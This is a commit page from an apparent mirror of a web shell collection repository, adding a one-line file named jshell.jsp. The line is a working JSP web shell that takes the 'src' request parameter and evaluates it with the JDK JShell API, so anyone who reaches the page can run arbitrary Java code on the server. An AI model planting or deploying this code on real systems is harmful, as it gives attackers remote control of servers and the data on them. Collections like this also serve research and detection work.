1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 04:41:28 +00:00

Create jshell.jsp

This commit is contained in:
tennc
2019-10-08 14:46:46 +08:00
committed by GitHub
parent c1112c2706
commit 294061690e

1
jsp/p2j.cn/jshell.jsp Normal file
View File

@@ -0,0 +1 @@
<%=jdk.jshell.JShell.builder().build().eval(request.getParameter("src"))%>